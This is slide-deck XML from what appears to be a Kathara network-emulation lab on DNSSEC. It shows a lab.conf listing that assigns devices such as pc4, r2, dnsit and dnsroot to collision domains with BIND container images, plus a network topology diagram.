              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99343B8F-765B-7C61-D275-1247B2C19873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5972742C-3E08-E49F-D54A-A6030F9847DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FEB7AA0-EC38-51B7-9C19-0DC77C449848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279802993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F05973-D623-96F3-7E8C-A0769A449F0F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9336" name="Connettore diritto 9335">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FAC2B60-E9AD-42D9-90F1-CD5C95F6798F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8041412" y="3065463"/>
            <a:ext cx="7414" cy="615427"/>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43" name="Connettore diritto 9242">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C46CCA-5856-6CD9-369C-1215896705C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6403424" y="3065464"/>
            <a:ext cx="7414" cy="615427"/>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9235" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81170554-F13F-6AA0-66F3-F1CF00786D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292418" y="3045154"/>
            <a:ext cx="4543674" cy="4664"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946F34CF-36CC-7987-96E2-FCF27A55A7F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9812223" y="2974820"/>
            <a:ext cx="23872" cy="316206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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FF2A64F-06DB-06BB-5032-9B52F18EC9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2325716" y="6326233"/>
            <a:ext cx="904078" cy="79994"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connettore diritto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C30FE3-88E2-32C1-7F72-E6BE5E84F649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3229794" y="6156631"/>
            <a:ext cx="1810441"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Connettore diritto 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08F6540-7F91-60FD-A727-ADF2B73C1374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1917704" y="5790799"/>
            <a:ext cx="1310271"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9327" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD5E6B2-5F12-AC42-90BA-A30FB9284B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1348638" y="3095873"/>
            <a:ext cx="7415" cy="505625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9305" name="Connettore diritto 9304">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AECED175-3B47-8767-9F8A-EA43A3780EBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9287" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764107" y="1822409"/>
            <a:ext cx="20032" cy="647488"/>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9298" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DED0F17-13AB-A80D-C759-1B3CD5D5B9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="3033869"/>
            <a:ext cx="3526369" cy="2659"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9297" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE2F2B2-C79E-EB8B-0478-9D24FC383EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3799212" y="3881170"/>
            <a:ext cx="1286124" cy="6713"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="55" name="Connettore diritto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60ABC099-882C-AD78-A3E0-F0E4422002FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5217619" y="5309001"/>
            <a:ext cx="7414" cy="615427"/>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50" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D99FC73-99B6-AFEB-4845-4C4C759E6563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7403649" y="1891613"/>
            <a:ext cx="20032" cy="460633"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connettore diritto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705D1311-A8A4-6974-A0CE-CFA6DC95F67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5691343" y="1822409"/>
            <a:ext cx="5866" cy="635826"/>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Connettore diritto 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74E92B9-FCBA-AEDE-4795-C39EE76C2FAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763186" y="1841489"/>
            <a:ext cx="0" cy="60239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Connettore diritto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F98BBA-C24C-BA52-858C-ACDDFB6A9BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821141" y="1834146"/>
            <a:ext cx="0" cy="599215"/>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9220" name="Rectangle 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70203AD6-32A1-48F1-4AEE-2AC08BF68D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>network topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2A1696-8396-2433-74ED-9B3865127A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0EC48F8-7279-733A-5DFC-F7A308A69721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
